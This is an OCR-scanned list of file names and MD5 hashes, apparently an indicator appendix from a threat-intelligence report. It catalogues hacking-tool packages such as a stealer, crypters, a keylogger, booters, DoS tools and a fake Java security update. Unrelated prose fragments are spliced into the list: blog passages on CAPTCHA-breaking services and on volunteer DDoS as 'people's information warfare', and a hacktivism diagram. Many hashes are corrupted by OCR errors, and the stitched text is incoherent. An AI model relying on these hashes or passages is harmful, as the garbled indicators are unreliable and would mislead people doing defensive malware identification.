Nether StealerC.exe 
7e296c7f471fe5cb706e22953fed2024 
SaintCrackers Crypter v1.0.exe 
760feea916fe1338007c168bba30d5f6 
ShareCash Downloader V13.exe 
ba31d3060c8b110e392ef25954df700b 
Sharecash Survey Helper by h4ck3r14.exe 
d86b1a667f4c98490342c03e12dbe662 
ShareCashReflector by h4ck3r14.exe 
c4bcd31b04bd8388725d2a94d7e7fbc2 
Shockwave Booter v2.0.exe 
1¢72942961917ccf4fc5bele823ab4cb 
Stub.exe 
Youtube Viewer V3!.exe 
b95bf6e70584d7b79d7089cd24f3128d 
ZMini.exe 
efaee196e003b99abf8930cbab6ccOf3 
{Unknown } L33Ts Keylogger.exe 
53e79633dce24bb133de38e980371741 
2010 09 21 01 _webvulnscan7.exe 
bc634fd2f72a279dc98509887a20b1la7 
config. ini 
33989023f9daa6f261c8a483c474a84e 
data.fdb ff287db009a85a8ebb88ccd8d3aabcc6 
SystemExplorer.exe 
423d4d3352facOdec6f24d73c052401e 
vokeon Appz.bmp 
81b696deedd945379a2988d6ac172110 
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vokeon.com.url 
82f690c1216e83cd7901ce66754d8723 
Wallpapers Bunch.url 
ea9edc51455a5d1b320f4e7a329f7F4f 
Arabic.ini 
9770742632a22b1b2b88cb54736636eb 
Belarusian. ini 
0251d45e9b8d670ea619d2e58df5f311 
BrazilianPortuguese. ini 
a9d870cd236f6cbf8068fbb34ce2b99b 
Bulgarian.ini 
6bf7e000b69555b9cf0b232 7f09fd4F4 
Chinese. ini 

3e1c0b7be4f084a1 7e89bdf785bd5351 
Czech.ini 
c44132aaefe6ac8690a4f57c7eeld2cl 
Danish. ini 
30087430005dedd3e569a726835863a5 
Dutch. ini 
4fc4ed80660d468dd62ed0ec81b935db 
English. ini 
f11a8a583f8395ebfld4e28ca0896380 
Finnish. ini 
6ba987e05f5684e785421203f6dafl3e 
French. ini 
286baea52a6be3706d3f010047f7bf9F 
German.ini 
519d31b4dd3d51a30928e067ae3c11b2 
Hungarian. ini 

bObb2fac8f145 1lef8f26daed55030205 
Italian.ini 
64a9d74edd970f0948f165321ce5b273 
Japanese. ini 
6deee3551da866caldd53e588704149d 
Korean. ini 
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daf642a0163521dee0988cfd3126e867 
Norwegian. ini 
3ee5b5190bb877c8083f9338886b0b66 
Persian. ini 
04675f4e15de7bdb3250baad32d56653 
Polish. ini 
bb429b444f3f3d8e211ca560ec960831 
Portuguese. ini 
1f7b148c873ca767c4a0278b8beb0d81 
Romanian.ini 
20a54a341968bd6527caf6237b7af76c 
Russian. ini 
7633ff3c7864e987183ce38dc5ea022b 
SimpleChinese. ini 
2ef3d59500db42ba2919f40717ec7502 
Slovak. ini 
b6ébeed8658ee4096b4014f816988998b 
Spanish. ini 
d16656b85b28dc4e94eeca04ebela3ce 
Spanish.ini.old 
f63f86989b980a18bb26dc8a7228fdda 
Swedish. ini 
dica88db2969ff31lee5b4e68flbceb2d 
ukrainian. ini 
961f733795c8681a9a142de67065cc79 
file_id.diz 
a2480c53f3e7a94ba5e569d915c92d03 
how install.txt 
0185c0761bbd2f344286e5c215114dbf 
mesmerize.nfo 
f7de245f24d5ae970fd52fe3fe41a866 
English.Slg 
b602c9a49c8a53432cda3a3dc9b6e900 
French.Slg 
a3f081c7fal224ecc60ecad2dfebbaf0 
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README.TXT 
5d6d71df25a54d18a4dd3cb78481a3e8 
THotkeys.dll 
b17676b29c48349e732c41918d55a7e5 
TSearch.chm 
dc198653f3abec499e7c809af7C9a262 
TSearch.exe 
218203711fd0bab236ba4ab5fe213dec 
TSearchDIl.dll 
ac6067e5a8519dc55e3be059396c0673 
TSpeech.dll 
cbe5602443918328d1722a85dd4e0916 
Adfly v152.exe 
087416b2f25224e8a04b7d7c00001491 
Settings. ini 
4eeb378956a57b2926951df72248de0b 
AdFlyc.exe - Shortcut.Ink 
9b3ec1f621d0bb6e053e48fe104d99fd 
Proxies.txt - Shortcut.Ink 
8dd55f50c837e6d1228b0e1b9f19b07e 
ReadMe.txt 
293b656fd28d22ce7203261402bb5680 
Start.done 

AdFlyc.exe 
b47a039e2df74801bf587a3481417561 
freebl3.chk 
ead25933fad109321a75b47253bbe0c6 
freebl3.dll 
1cda833d774a01e34dc0ed183a9bc4f6 
[A2Marshal.dll 
28450f84b12479a8abal7a32211b7921 
js3250.dll 
e64ce6488baa577aab7774dbd00a95ee 
LICENSE 
6a168402790208145f7dc05e95de08ce 
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mozcrt19.dll 
bfd81394b71b4acebb903dee81d485ce 
mozctl.dll 
50e993a8a3e4262bafdb07f29e677f15 
mozctIx.dll 
ce03e0d759335ad511dc6d1a27c156d2 
nspr4.dll 
7554a0d8346275def93648cf709aea6d 
nss3.dll_ 2dc05baa43879b7b8da429cd0b3a4123 
nssckbi.dll 
7aa7598cfab94ef12f6358c9e98f475d 
nssdbm3.dll 
2743096804be09d2bcee4ae31f8301a0 
nssutil3.dll 
b795f095b3aed83bc16d58912a143d3c 
plc4.dll e9e96562b26b045deaa93d99731e6a0e 
plds4.dll 
a60e59594f8b78484607ade81dd21e82 
Proxies.txt 
60e8a058c81e38334290ac33ed572ff7 
Skybound.Gecko.dll 
87c14378f78ab14a59defb4f9e5585b2 
smime3.dll 
5b921b220ad62e714a3ddd44a8c3524e 
softokn3.chk 
aa2d29ceb89d6dcf3543ec4b4f6dcdce 
softokn3.dll 
005685219b4522b4c08a0bfece705cca 
sqlite3.dll 
ad0e12bca3b6ea2ab607cbb41def39c3 
ssl3.dll 3a29e088eda5390120f9fd99b9041165 
Start.done 

user-agents.txt 
e3ddf858ab716408aa3994f73de8c845 


xpcom.dll 
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9355dcc4alfef80a010e7bcbe2e8a2c0 
xul.dll 
845ac2563ae3f507342d81edfb550da9 
classic.jar 
1d80aa1d1342e18e9002edb7adfb6461 
classic.manifest 
cf6698f8c78a12260f8e610a3f1d1449 
comm.jar 0a797fb952f76cb6f3d1f7ff3c20c0c6 
comm.manifest 
940eaa4676d333fc76e2c37e7e7e3a85 
en-US.jar 
4c235b392b00aee216767f549adc2909 
en-US.manifest 
54b260499057d17278a959e4828eb2f8 
geckofx.jar 
fcc3871026813eb5ea26caefcae4ae5b 
geckofx.manifest 
c9a4db2501449ac42d31ba77e461c73f 
pippki.jar 
0694874566e2bd216feeaf0ebb75db89 
pippki.manifest 
433dbb4921ce78024add72a778754702 
toolkit.jar 
69eea57c4d03160962c3adb4cfb85f57 
toolkit.manifest 
ad8773f30faa9ad08964de999c106540 
accessibility-msaa.xpt 
db70d1c81d9e72e38cb8d4ad93401658 
accessibility.xpt 
6e75cb8c283513b7f1c788d48b33704a 
alerts.xpt 
a9dc4f4353241ffl0cbeb5c752c30ad7 
appshell.xpt 
8b9539831552e9ba8950d931601304af 
appstartup.xpt 
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65ead3b91a5e64955e79f2d3ad8cd00c 
autocomplete.xpt 
4f63da360335ede98e2721ca594e9277 
autoconfig.xpt 
7969c0c51592e8cc6f69Ff5 7f367c4294 


caps.xpt 14e6d9c7e5050c097e78cf4f2c9d7573 


chardet.xpt 
85596ec23e2e8d047e05b0202059cddc 
chrome.xpt 
5c4cleee3e531bf931d1a3e24b0baaec 
commandhandler.xpt 
bb31d81fcbc4daf6677ddca1376a44d5 
commandlines.xpt 
76b¢967ee5444bf11961bfd12f406d2f5 
composer.xpt 
d8538410703b571d444978db0d1f2147 
compreg.dat 
bdb46d909e21596ea4c0f5a8d395b79d 
contentprefs.xpt 
6fbc667b4b7c4bffc5cea135d8042d0a 
content _base.xpt 
837c8fea346349ef3c8ae416cd3b087d 
content html.xpt 
76971bb20e5d7b187b366b3269a45411 
content _htmidoc.xpt 
4f4cc6348dc0077ec4da32fcd7e2078a 
content _xmldoc.xpt 
7ba32fed6c5a40188994b96e845a4993 
content _xslt.xpt 
dfd5a4ac0e109e4514abf1940f09fa56 
content _xtf.xpt 
f9d9f320c7bc3dca7260ffe810675b44 
cookie.xpt 
46e4a068db8e3ff90f830c5081F5 14 ff 
directory.xpt 
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1¢52069c119c48ae9004228a33ad0124 
docshell base.xpt 
2fleedf8c98ff6fa60c21445000a1543 
dom.xpt 
af748659f8f945358bc76a645b5cee69 
dom _base.xpt 
594eab9a2fd751b8ebc870c4ddd099bc 
dom _canvas.xpt 
adc9a4b8449b1f1fd960ea6056e11045 
dom _core.xpt 
0e120922bee8445d42812f0cda4e974c 
dom _css.xpt 
4e12ca2a7d86fb02b32cb9ae4409131d 
dom _events.xpt 
6265cbb7bb02ab6a44cee155c55964ad 
dom _html.xpt 
a51ea2a02e955110db6232ab039356e3 
dom json.xpt 
6b850e1d61ccflde9012a2d2b80735b2 
dom _loadsave.xpt 
6b8e7abba89bc19f72b92f02581affa2 
dom _offline.xpt 
9868c64a28564c68e196dfca3521f501 
dom _range.xpt 
48e68869514d63d4030e76a6c17f9Fb0 
dom _sidebar.xpt 
47292c85b8fédf958fbf145a1913aaac 
dom _storage.xpt 
00b6385f2820e845e2a0aa5e4e7913b6 
dom _stylesheets.xpt 
5e7b822a3e7652758a9dalfe39d2f871 
dom _svg.xpt 
9e753690f4758caa51bbed0376f93435 
dom _traversal.xpt 
5a91bebe5e413341a9b274232a85098a 
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example of a recently released DIY CAPTCHA breaking service where the users feed their ac- 
counts with credits, sets URLs and CAPTCHA’s to get recognized. If it were pitched at vendors 
or anyone out there maintaining a CAPTCHA as a service it would have been a great idea, trou- 
ble is, it would be largely abused in its current form. Let’s discuss the incentives model. Are 
developers of CAPTCHAs interested in improving the security of their CAPTCHAs in the form 
of contests with financial rewards or job propositions for those who dare to break them in a 
contest form? Not necessarily, and fixing vulnerabilities whenever such appear is done in an 
"on demand" fashion like we’ve seen with Vladuz’s Ebay CAPTCHA populator. CAPTCHAs at 
the most popular web services are the gatekeepers of their online reputation, else, the flood 
of [3]splogs and malware embedded blogs, as well as spam and phishing emails coming from 
free web based email providers may outpace the current model. 


1. http: //ddanchev. blogspot .com/2007/09/spammers- and-phishers-breaking-captchas.html 
2. http: //ddanchev. blogspot .com/2007/03/vladuzs-ebay-captcha-populator. html 
3. http: //ddanchev. blogspot .com/2006/11/blogosphere-and-splogs. html 


3.10.5 People’s Information Warfare Concept (2007-10-05 11:27) 


Malicious Culture of Participation 


DoS battle stations operational in the name of the "/1]Please, input your cause". Pre- 
venting a malware infection in order to limit the possibility for the host to become part of a 
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dom _views.xpt 
f7f0f182acc7bd6295badb8121el1bd8b 
dom _xbl.xpt 
500b748eca9a560c9921ca91f0160f82 
dom _xpath.xpt 
6770e5996d5fc4d635d8ae01c1le7d360 
dom _xul.xpt 
2cc84df6c9c3a29e70481931f83e8e65 
downloads.xpt 
dac4cf041416372a7ebe738347b6beal 
editor.xpt 
44936cc5b583e3a48670975509b4b313 
embed _base.xpt 
9581fb3bc267f8c1e66324226883904c 
extensions. xpt 
2426cdfc47897cb421828fd5dd0b19c9 
exthandler.xpt 
137d5456024e6fd189debd13395cOdb6 
exthelper.xpt 
c47d1a98a30ddfe9d6e156f1l2de5c412 
fastfind.xpt 
d29216ce33b401f21659776701bf76ec 
FeedProcessor.js 
75464fa937789a82f23b348ae290816f 
feeds.xpt 
f47b27b0ad314cbf07efc974eaaa7950 


find.xpt d1b7ff5d762993b4992853627af72939 


gfx.xpt 
1d7b5b6c7d9e310dde70dfa3d880e149 
htmlparser.xpt 
21ed9534aa2d1f50af675059e1d45c69 
imgicon.xpt 
f7d0c5d4f29004c423764a3e427076ac 
imglib2.xpt 
2839fd72b7d2e4078f795b1e55082363 
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inspector.xpt 
997c4d0799294d14ae7532efe11a9063 
intl. xpt 29cbe89849233b59bdb14d68a37d39d8 
jar.xpt 
e0275e6e7651984a0d1cdcb6e61al4aaf 
jsconsole-clhandler.js 
dc3aa6ec4b99958c4a0a76ec57647f9b 
jsdservice.xpt 
61209aeef30b7c56f2ea78dd2a271f16 
layout base.xpt 
d4b0182103335b8f50b7c5d5ee04725a 
layout _printing.xpt 
838e843cb8c567e637ed79742e8f5ce2 
layout _xul.xpt 
036cbc361fa9887d83c4183153cef830 
layout xul_tree.xpt 
f4164683bffc24c686a8b4d5b91b571a 
locale.xpt 
933d89e139953256c6c8591244857676 
loginmgr.xpt 
83b1fd72400f03f7f36eff22f41f9fe8 
Iwbrk.xpt 
8c2dleele9d1662c4d8ba7de34afbb88 
mimetype.xpt 
9c5fa9ebbfd58296b5589de6ba66270F 
mozbrwsr.xpt 
acf75c928def2b0340ee42ee1a89ff22 
mozfind.xpt 
fab54e38744ba79d670882161d571lece 
necko.xpt 
d1494be72c6ada62194fc2bffOb2640f 
necko _about.xpt 
b562e222dc946f4laab25fac4ffa8288 
necko _cache.xpt 
af4a6819fcfld8ee4c6bb1c996ade494 
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necko _cookie.xpt 
fba972b9f853e687a185970d904b74b7 
necko _dns.xpt 
20869ea38ecc2f8c6743a4e1b33812ef 
necko _file.xpt 
96f7c9cdc345ad1b0881847e61ff5518 
necko _ftp.xpt 
316b0dfd99e9b032ea601be69e635a45 
necko _http.xpt 
86c9e8fa24ca05214639f20c31278fal 
necko _res.xpt 
b4fa7b5c6el19bded5ee08b1c28de0b64 
necko _socket.xpt 
79fbf025475311aacad20702423e1a35 
necko _strconv.xpt 
8fbc6c44b58c882c0afc4024b303aefd 
necko _viewsource.xpt 
acbea5b9b887a9cdac4faa2e2c36l1ffe 
nsAddonRepository.js 
€5477a424750749f924d0e44ac3a9a7b 
nsBadCertHandler.js 
b97b9d92df3f18712f05f087e66ce7ad 
nsBlocklistService.js 
938087bacOfb2c6a46f82332550e6d9c 
nsContentDispatchChooser.js 
9c99879c6b888d5c3ac2a5b8c436b970 
nsContentPrefService.js 
6e5f3dfe993534df3a893204606e9315 
nsDefaultCLH.js 
a5e32a5e35602bad2533578271d01dcb 
nsDictionary.js 
0b22332c1cf81bcdd9255d6685d69047 
nsDownloadManageruUI.js 
7d606f968bcc700c4e69ea5daf7d1f1l1 


nsExtensionManager.js 
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15a546cb08261562a1902b64cde288e4 
nsHandlerService.js 
ed14ecb5888635005067973a86fc350f 
nsHelperAppDlg.js 
5054ad60f3950b00f79d01861ee219f0 
nsLivemarkService.js 
632e1126ffc9b8c24eefc8a30d537503 
nsLoginInfo.js 
09138317884a02dae00bf6d7daf748bd 
nsLoginManager.js 
2a5aa42ceccf975b10cc7ba0c5d365fc 
nsLoginManagerPrompter.js 
dffa0b894d8d606239473e224ab35a7e 
nsPostUpdateWin.js 
383458acebd3701c134703c128fbb578 
nsProgressDialog.js 
2e585032386846628ced6ba96ac91ec9 
nsProxyAutoConfig.js 
3ef44b84f79d73123510e9a7aalcad31 
nsResetPref.js 
946fc3e721ad299232a4de8b6338elfb 
nsTaggingService.js 
34b05c2e239a7b753ef7d6237ca8ca69 
nsTryToClose.js 
d33e557c3779c5f9bf1701cbe39dbdb2 
nsUpdateService.js 
698cbe87fac9e8074ee7e5d4f879F7 df 
nsURLFormatter.js 
c529e9ed61d3774e66dc2fel4d10c672 
nsWebHandlerApp.js 
30c94dec9f1d817fd6b0f35f5fe8466b 
nsXmIRpcClient.js 
b2eddf63f1b72d6a9253087bcdcOda4a 
nsXULAppInstall.js 
dla7c70e97b6848c26b78edcdblesdaf 
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oji.xpt 
7d1e46e3c6170de0219997870068be44 
parentalcontrols.xpt 
aafb7b0ebd58ff94a5079abe4c4ea98a 
pipboot.xpt 
f8f9b228fe6cc33681f72f9394a361d4 
pipnss.xpt 
7640c645e505dc1f0ecafaadbd3dad8c 
pippki.xpt 
2c7e68e54e7b4554503f9487a6803173 
places.xpt 
ecde1101c5bab539a0fc3d94ce9f6d30 
plugin.xpt 
58657918c998448fc2ed76411812bd0e 
pluginGlue.js 
€1331854859f2e185b2b35374497e9al 


pref.xpt 46b23ef163f85ab68ab5d731ac872099 


prefetch.xpt 
19db765356a636d39beb0bal129034a6c 
profile.xpt 
6186e89fa90e897cca72f554d7de55d1 
proxyObject.xpt 
d04c07176a76382f624087ed840c70db 
rdf.xpt 
bba52f5aeb7a77c96095cec89a2f8419 
satchel.xpt 
06a6310696e7039f3cd8e0e6b96d9d8d 
Saxparser.xpt 
adb493bc2167cf05e507049d67339ca0 
shistory.xpt 
c9e564a63be2773171ec58c22dela9a0 
spellchecker.xpt 
1f6978316413d3b92b4800842f7a61f9 
storage-Legacy.js 
73484d96f6c9albcfba742c1ld1cd8c76 


10897 


storage.xpt 
ed85905e50e932daf66bde2ca7677b7f 
toolkitprofile.xpt 
67dc70c63edf8e966ceaa536c81feb3e 
txEXSLTRegExFunctions.js 
253083afbcfda7 7ff5c41a0a75620a46 
txmgr.xpt 
d9897a726e6745dbb61dacal142153b6a 
txtsvc.xpt 
ddbe44181b396800b2ffb24c60bf0270 
uconv.xpt 
3c86ab1a75f0802b630289a75695d0d7 
unicharutil.xpt 
c138b9f4f789a512435f7a45f447ef80 
update.xpt 
28a36f298b71882c9bf296161ea88e20 
uriloader.xpt 
991d6bfcb6ed6aa9fcda2a2478363087 
urlformatter.xpt 
6be267b2d177d96341cf7b705a3f2cb9 
webbrowserpersist.xpt 
c07052e91b902d161bf2ac65260ebad2 
webBrowser _core.xpt 
5f8bd2cOb2f486af9bfdc3765338201a 
webshell _idls.xpt 
b16a357ac0743fb7849988cefédabff8 
widget.xpt 
f9bcc63be945fc904d35260fec442bc5 
windowds.xpt 
c7e3aaa37efecf53f3c682eb92d67726 
windowwatcher.xpt 
bf4f9718ccbbdc9d76537f1676af5cf3 
xml-rpc.xpt 
654b5066aa9f5dfcc18f27014b815711 
xpcom _base.xpt 
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bc4ac1d696ad6a670ba04efd745b56e2 
xpcom _components.xpt 
efclb79b73fa786653fd1d0cc926eb95 
xpcom _ds.xpt 
013bb089cdcc4e75cc5ddd36fb5f322F 
xpcom _io.xpt 
8ab83d42aa801d2775b6dd8881e982a0 
xpcom _system.xpt 
1043e964347ed0791f5e78d214ffca84 
xpcom _thread.xpt 
4c69cdf02e8e709de7f47e192c6dd2eb 
xpcom _xpti.xpt 
ff1774deab1d1510ca8albb73aedca57 
xpconnect.xpt 
87317532b2f92e48849c959300b3b21b 
xpinstall.xpt 
cl11l6ee38ffd67ffdaa737f979ba54554 


xpti.dat 976521931cfb942a005e49bb1c781750 


xulapp.xpt 
b6b3f21f0b954cd960622adc0a76e936 
xulapp _setup.xpt 
6e355d4ca77c3a2d2612504e2752a14d 
xuldoc.xpt 
f9e89d8cbab6fd7df2a5235c478eddcbe 
xultmpl.xpt 
11e7778d201e069287860034c3299cba 
zipwriter.xpt 
9e2cf9e243679c0c0e4d996297b8c7fe 
platform.js 
e3c0b603d8720a81116319d44ee421e6 
prefcalls.js 
4a87b8ed95918a8a94ace81998529f18 
xulrunner.js 
6809710e442b424f7c27d94ec3ba4657 
localstore.rdf 
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ea03cc19c2a3f622fa557cd8ea9dabeb 
userChrome-example.css 
4788fdaa51b0a238cb21f5c2877ef06d 
userContent-example.css 
d3765c7d2de5626529195007f4b7144a 
localstore.rdf 
ea03cc19c2a3f622fa557cd8ea9dabeb 
userChrome-example.css 
4788fdaa51b0a238cb21f5c2877ef06d 
userContent-example.css 
d3765c7d2de5626529195007f4b7144a 
en-US. aff 
1d47ab1b6a07fdf04c34a78c00794077 
en-US.dic 
fe2697aec75d3e49e0b43bca59e9334b 
all.js 
f6c075356f3cefelc372513e18a5bf83 
security-prefs.js 
445e32d3eadala38cbd433504327d04c 
xpinstall.js 
eb2ce400f30e5aaea7957379005cd5d3 
all.js 
fc445dbb4d26431818c1992ba37b0078 
debug.js 66843160c8b16444438d0e76f2d3cd8c 
Downloadutils.jsm 
e8170fe01ae59a6c87b1dbbdcf655087 
ISO8601DateUtils.jsm 
f8f9ded330a1b66d5256ad4785bb9dfa 
JSON.jsm 607216401e05397600ee1d107ad811c6 
Microformats.js 
72437d18098503f890658834d3bfd5e5 
PluralForm.jsm 
191b9142e4decacc2ff3dcd470d754c4 
utils.js b23fc77883a194f2abe423190b1a858d 
XPCOMUtils.jsm 
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05f8129d77181a7d50cd6c17174b5755 
npnul32.dll 
3bb886acb585dd12ebfabb0e20bb052c 
arrow. gif 
a8402374069ffe8e23326ae4bec08a66 
arrowd. gif 
6bf2d8c5ca467c97888ebf8b03a4237a 
broken-image.gif 
2505291b232e3d121fce99652b1196fa 
charsetalias. properties 
b1430a8af0a6956daf02ed222b46ea7c 
charsetData.properties 
0b792d3547c9092ae21e5dab0412bc83 
contenteditable.css 
64683081fe6eb8ccad5636483b8b7441 
designmode.css 
Accdfc58a6eb5109fee61c81cb2c9ca2 
EditorOverride.css 
5196388791ae40c89985316a4eaba4f2 
forms.css 
a9dalf7dd288829d1da03ff8a4c579c1 
grabber.gif 
ccf39b06aa3282d0a1f9e7582418583d 
hiddenWindow.html 
0c016c31bf6369424576eb280c105866 
html.css 055blead4d36ed27440d209646ed1c4e 
langGroups.properties 
c792ba7f3b8bbbdd147e0d5ddf4e8523 
language.properties 
4cb0ade6b7bc05d6b9989a07b6352e2d 
loading-image.gif 
b76ea1a0c2463170fab8de48e97a0693 
mathml.css 
fe8a986c73f6087c03bcabe79a85c876 
quirk.css 
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974cded4d781led8afe93886c0f9b6468 
SVg.CSS 
d4c98610055e99dfb1b9b85cfd5d2bea 
table-add-column-after-active.gif 
55291a8dc9802ce8cbbc5d92aa98617e 
table-add-column-after-hover.gif 
0c57685fbbd85c5eb8aal186019576972 
table-add-column-after.gif 
feff9eba20bc5ffc063c0b659ddfecfa 
table-add-column-before-active.gif 
220ac222b8234f8965f35732044dac31 
table-add-column-before-hover.gif 
db5b629893e402162b24764d509337de 
table-add-column-before.gif 
2915biccccef8flb4efe358744fc4a35 
table-add-row-after-active.gif 
344e4cc9a285d380f55129af513192ba 
table-add-row-after-hover.gif 
73d91177fe9ee5a7d6f27f950fdaed06 
table-add-row-after.gif 
86ea7058408e6573f06e35a22c381e5b 
table-add-row-before-active.gif 
e5a008df8ee0987d63554f36cle4eecd 
table-add-row-before-hover.gif 
3effbb21fc1ce4a3541ff129e61b6360 
table-add-row-before. gif 
3bca4df18e26d1d22adfdc990fcbbcdf 
table-remove-column-active.gif 
cdeebllaaefc565b7e2e6de6c5122adb 
table-remove-column-hover.gif 
f6f8b831f31c8a4081e61403b258d944 
table-remove-column.gif 
90ef7ea72f363d421c608e37141f0e29 
table-remove-row-active.gif 
cdeebllaaefc565b7e2e6de6c5122adb 
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botnet that will later one [2]start a large scale [3]DDoS attack is such a rational thinking that 
[4]information warriors truly understanding what [5]Jinformation warfare is all about, tend to 
undermine. The recently discussed "[6]people’s information warfare" concept highlighting 
China’s growing interest in the idea, is a great example of a culture of participation orbiting 
around hacktivism cause, a culture we’ve also seen in many other hacktivism tensions in the 
past, and will continue to see in the future. The entire concept is relying on the fact that the 
collective bandwidth of people voluntarily "donating" it, is far more efficient from a "malicious 
economies of scale" perspective, compared to for instance the botnet masters having to 
create the botnet by infecting users in one way or another. Moreover, empowering an average 
Internet user with [7]diversified DoS capabilities is directly increasing the nation’s asymmetric 
warfare capabilities in an event of a hacktivism war. 


Furthermore, the majority of DoS or DDoS flooding tools have a relatively high detection 
rate, but when people 


Civil disobedience, which 
includes phenomena like the 
lunch counter sit-ins of the civil 
rights movement, exists entirely 
offline. It is separated from 
hacktivism by its situation in the 
real, rather than the virtual, world. 


Online activism, which Cyberterrorism, which might 


includes phenomena like include phenomena like 
See Hacktivism res oem 
exists entirely within the airplanes, is still a hypothetical 
accepted bounds of phenomenon. It is separated 
conventional political from hacktivism by its 
activity. [Lis separated willingness to cross over into 
from hacktivism by its violence against actual human 


beings, or substantial damage to 


adherence to the legal 
order. physical property. 


Hacking was originally defined 
as any clever, unintended use of 
technology in order to solve a 
problem. It is commonly used to 
describe unauthorized intrusion 
into private computers or 
networks = although destructive 
or criminal intrusions are often 
described as “cracking” by the 
hacker community. Hacking and 
cracking are both separated from 
hacktivism by their lack of 
political goals or intentions. 


Figure 1. The boundaries of hacktivism 
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table-remove-row-hover.gif 
f6f8b831f31c8a4081e61403b258d944 
table-remove-row.gif 
90ef7ea72f363d421c608e37141f0e29 
ua.css 
94a7f28752c203253a9ea59d278c2f7a 
viewsource.css 
cf294be623d77ef6e79414180f04ac15 
wincharset.properties 
daf08d2c812f7185c4e2472febc6b8ec 
mathml.dtd 
38a0a46cebdf1l3e3abf3b38186657b1b 
xhtml11.dtd 
7£7b2f0922918714b3cadcb21eb30de4 
html40Latin1.properties 
4ba94eac1147dd9ad4b427351b744775 
html40Special.properties 
4a451270086e7a7ec3ab34946922bace 
html40Symbols.properties 
710ac52b998e1711e516320cO0adcfc85 
htmlEntityVersions.properties 
435964b8ff8ea502582e163172151cla 
mathml20.properties 
ea0609b3ec57139f68b0a5a7ffd69c9a 
transliterate.properties 
1dba3d8d7921c78d10861e451b1ccad8 
mathfont. properties 
241c¢5c7ee3aab3f4302373fb177607a8 
mathfontStandardSymbolsL. properties 
04658e1816d47725107230d71ad671fb 
mathfontSTIXNonUnicode. properties 
893bb388ce13875019216800e03f0059 
mathfontSTIXSizel1.properties 
33629de320c6079c56c97790aa551294 


mathfontSymbol.properties 
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2e3f363a88007b6ce0d2d8704d3015fb 
mathfontUnicode.properties 
823802eba2d10ac9a5a3al174ccbe09c4 
folder.png 
61eb7640f39a196c27f0bd7bab7708f1 
desktop. ini 
729ef6ef31e58f51af449713abb92672 
GET IP website [ Al’ Projects 2012 ].exe 
alcl1f322a8bbcae6b40fb4affe0367f7 
Mail Bomber v1.1 [ Al Projects 2012 ].exe 
7b05d0c1ce8ab755c3b7e2e4fdla243a 
Memory Pumper [AL ‘Projects 2012 ].exe 
a9eb37bc316ce02d9f3b43b8370a8847 
Ping Website [ AL’Projects 2012 ].exe 
74c76fbbc5f51ba80aleb4c25f7 70446 
Config. ini 
c54f995542eb67fab6ldaa7d1c9bc609 
Dumped cracked.exe 
Od9bab36f0a0a022fc145be477c4aab6c 
Codejock.CommandBars.v15.0.1.0cx 
ele66fdbf16c36875c3a617d7269189b 
Codejock.Controls.v15.0.1.0cx 
6a021b290d913525f2f7225462172690 
Codejock.SkinFramework.v15.0.1.0cx 
6e0ce4623cffd9abe988bd57a7d5e468 
comctl32.0ca 
be33680428f4ea566940bc1b6ad302fb 
comctl32.0cx 
eb5f811c1f78005b3c147599a0cccf51 
Comdlg32.0ca 
e4cc556aa9eeafe323147ccc5d3c15a4 
Comdlg32.0cx 
d76f0eab36f83a31d411laeaf70da7396 
CoolXPButton.oca 
1a135leddc6a07dfd639a30bb13ee661 
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CoolXPButton.ocx 
5ea96693f648cbd37a4a2c1b90c7f420 
CoolXPCheck.oca 
7f1a2792e7e473165551353bf17e76fd 
CoolXPCheck.ocx 
fa526e1dd2c13261bd3ebdf93b744e95 
CoolXPText.oca 
e2e925a57d1e912bec96fd753792d0cf 
CoolXPText.ocx 
dbb7aal3becb1f45604f4c06965046bf 
MSINET.oca 
9ecbb7c9fa0b736d4409a9939ffb62dd 
MSINET.OCX 
7bec181a21753498b6bd001c42a42722 
reg.bat 
1870c0877f8d583330faa4bc4520fff1 
Registrator.exe 
0a107bbfl38aaac2daeac73cb56f1le00 
Required OCX.txt 
015ee77d71dd7flbf416c0659dcafd91 
Default.ico 
76685dfa5860561a421b7acc5f5c37fb 
ResHacker.exe 
66064dbdb70a5eb15ebf3bf65aba254b 
Reshacker.ini 
212e€2299f3813021916428283707054a 
Reshacker.log 
614cf6ff117c3a32c9b03dcc64db48db 
UPX.exe 
308f709a8f01371a6dd088a793e65a5f 
ddosping By Saeed.Jok3r.exe 
9la6c9ee3dfcbb3375edc4d79182bd43 
ddosping.cfg 
73cbb5dbdfab5d35da356235b8c3a743 


readme.txt 
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faccfa5ce5c019a383a70ff9a73aecbb 
CONFIG.dat 
4de42d0f6b065f051fb5ff2fe530276a 
DoSHTTP.exe 
99baa8d24ce0e5ad14b1b9db3cff8482 
INSTALL.LOG 
45b13fd368eaa2ccc26c78210902ec97 
LicenseAgreement. rtf 
f59200d3b3b7cO09bfd379e367aaf652F 
LicenseAgreement.txt 
dle88fba57f32fc7481db2302cf13a3d 
UA.cfg 
dc2bddf146d0ca8141558618e985bf51 
UNWISE.EXE 
973567b98cdfc147df4e60471d9df072 
UserGuide. rtf 
dec3fa4e5a7bc588681a2b353059e046 
UserGuide.txt 
83112d25d310c3ffeb55cf207fb3093a 
index.html 
a726ac94cd2e9185ebcd6198d786717c 
lovepic.jpg 
5eb94d99bf4e95b807087ed1a37f5a84 
Sun Microsystems Java Security Update 6.jar 
45761a3d209c1cb308a22545d6a8b966 
AyuzlSDEsP.frm 
1led7f2d02b7daab0726135b70228d53 
BAQdnW7ZR.bas 
831510a95b7c0883eff68987317375el1 
BKq2AIXD9cnAVbi42XUm.frm 
4875296654c6ee0bc1810db7cb07ea44 
cIsNI_Debugger.cls 
af637d91a16e817ec9de4236d72787ec 
CooDD6UBGXGtLUAjH6kCYZg.frm 


5be0b5a9681f0789279335fb54aa4eb3 
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DCayL2Agtn1zq.frm 
e9cal473f37fdd1f8c6634a1a098e565 
E6A36ykxkPDhbCDeOocF.frm 
8defb3edd230abf71beeea6770febe77 
FC Settings.ini 
1344357d248351le9a8bflle16d3f483e 


FCKG.vbp 10092f78eefc711e3a46ca2e6c405612 
FCKG.vbw 4817e2fd3673099c7f57ef07f96d639d 


Fly Crypter v2.5.exe 
68e27b83b2a00d74f4dc67ec8a598346 
Fly Crypter v2.5 new.exe 
062d16bbcf822e8f3427cff2429be0ed 
FlyCrytper + USG Patcher.exe 
f9c5985898d7aald9a41fce5abd03f0a 
Form1.frm 
44ddbf9023a6bfefcf63bdaf9f72385e 
Form1.frx 
9215586d7b7a5cfc54cfdlef274a2422 
HmAZ9k Settings.ini 
7569d89117616e25bf1lb709cce28ccb2 
IOxXAHRRPLyv5Fi.frm 
f454a77d9d03c6a5373090a6daf961c7 
keygen.exe 
83bb008383f2978aacf8e83284c38a10 
